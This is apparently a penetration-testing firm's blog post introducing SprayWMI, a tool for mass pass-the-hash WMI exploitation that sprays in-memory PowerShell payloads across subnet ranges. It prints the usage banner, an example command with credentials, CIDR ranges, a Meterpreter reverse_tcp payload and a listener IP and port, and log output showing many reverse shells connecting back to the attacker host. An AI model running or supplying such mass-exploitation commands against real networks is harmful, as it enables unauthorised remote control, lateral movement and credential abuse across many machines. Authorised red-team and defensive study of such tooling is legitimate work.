Awhile back one of our folks Justin Elze (also wears white socks with business attire, just saying) wrote an amazing blog post around no need for PSEXEC: https://www.trustedsec.com/june-2015/no_psexec_needed/ In the blog post, Justin went through how to leverage wmis and wmic for exploitation methods instead of using PSEXEC. Some of the downfalls is that pass the hash with PSEXEC is detected pretty easily as well as often times an executable needs to be dropped and a service created which is noisy. WMI is an extremely powerful method that uses port 135 (RPC) in order to establish a communication and perform actions. The cool part with WMI is it doesn't leave files on the system and can be used to leverage attacks such as the Magic Unicorn (github.com/trustedsec/unicorn) to perform pure memory-based exploitation on a large scale. Recently Justin and I were on a pentest and found that Server 2012 R2 in a locked down mode was not allowing PSEXEC (psexec_commands specifically) to execute properly and would not be able to drop shells that we needed. Alva Lease, Skip Duckwall, and Chris Campbell did some awesome work at BH talk awhile back and released pth-suite which incorporates a patched version of wmic and wmis which allows pass the hash. This allows one system to be compromised using standard syntax in order to execute a command. We wanted mass exploitation so we decided to write a tool to help automate mass exploitation. Introducing SprayWMI which leverages wmis and Magic Unicorn to automatically sweep subnet ranges for 135 and automatically attempts to login with either a password or hashes and automatically generate powershell injection to give you access to your payloads instantly and without touching disk. This is a full replacement for traditional PSEXEC and recommended. With SprayWMI - it moves super quick, finishing a class C in around 4 seconds and automatically creates the injection code, the listener inside of Metasploit, and launches everything for you. All you need to do is sit back and watch the shells flow in. Below is the standard syntax to start the tool:

root@stronghold:/home/relik/Desktop/git/spraywmi# python spraywmi.py 

 __   __   __                        
/__` |__) |__)  /\  \ / |  |  |\/| | 
.__/ |    |  \ /~~\  |  |/\|  |  | | 


	Written by: David Kennedy @ TrustedSec
	
                                     
SprayWMI is a method for mass spraying unicorn powershell injection to CIDR notations.

Flag descriptions:

DOMAIN - domain you are attacking - if its local, just specify workgroup
USERNAME - username to authenticate on the remote Windows system
PASSWORD - password or password hash lm:ntlm to use on the remote Windows system
CIDR_RANGE,CIDR_RANGE or ips.txt - you can specify a single ip, a CIDR range (192.168.1.1/24) or multiple CIDRs such as 192.168.1.1/24,192.168.2.1/24. You can also specify a file (ex: file.txt) which has single IP addresses on a new line. 
METASPLOIT_PAYLOAD - this is the payload you want to use example: windows/meterpreter/reverse_tcp
REVERSE_SHELL_IP - this is the IP address of your attacker machine that you want to create a listener or use an already established listener
REVERSE_SHELL_PORT - port to connect back on for the reverse
OPTIONAL: NO - specify no if you do not want to create a listener - this is useful if you already have a listener established. If you do not specify a value here, it will automatically create a listener for you.

Usage: python spraywmi.py       


root@stronghold:/home/relik/Desktop/git/spraywmi# 

Actual usage is pretty simple:

root@stronghold:/home/relik# python spraywmi.py TS kennedy-test complexP255w0rd! 192.168.90.1/24,192.168.0.1/24,192.168.59.1/24,192.168.96.1/24,192.168.1.1/24 windows/meterpreter/reverse_tcp 192.168.47.24 443

Next, let the shells rain in:

[*] Generating shellcode through unicorn, could take a few seconds...
[*] Launching the listener in the background...
[*] Waiting for the listener to start first before we continue forward...
[*] Be patient, Metaploit takes a little bit to start...
[*] Sweeping network for ports that are open first, then moving through... Be patient.
[*] Launching WMI spray against IP: 192.168.90.1 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.20 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.21 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.22 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.23 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.96.242 - you should have a shell in the background. Once finished, shell will spawn
[*] Launching WMI spray against IP: 192.168.1.13 - you should have a shell in the background. Once finished, shell will spawn
[*] Spraying is still happening in the background, shells should arrive as they complete.
[*] Interacting with Metasploit...

msf exploit(handler) >
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.174
[*] Meterpreter session 1 opened (192.168.47.24:443 -> 192.168.90.174:49868) at 2015-10-13 04:33:55 -0400
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.203
[*] Meterpreter session 2 opened (192.168.47.24:443 -> 192.168.90.203:51333) at 2015-10-13 04:33:59 -0400
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.184
[*] Meterpreter session 3 opened (192.168.47.24:443 -> 192.168.90.184:61218) at 2015-10-13 04:34:02 -0400
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.204
[*] Meterpreter session 4 opened (192.168.47.24:443 -> 192.168.90.204:54219) at 2015-10-13 04:34:06 -0400
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.175
[*] Meterpreter session 5 opened (192.168.47.24:443 -> 192.168.90.175:54210) at 2015-10-13 04:34:10 -0400
[*] Meterpreter session 13 opened (192.168.47.24:443 -> 192.168.90.248:53657) at 2015-10-13 04:34:31 -040
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (885836 bytes) to 192.168.90.39
[*] Meterpreter session 14 opened (192.168.47.24:443 -> 192.168.90.39:60451) at 2015-10-13 04:34:35 -0400
[*] Encoded stage with x86/shikata_ga_nai

SprayWMI can be found on our github page here: https://github.com/trustedsec/spraywmi This article was written by David Kennedy - Founder of TrustedSec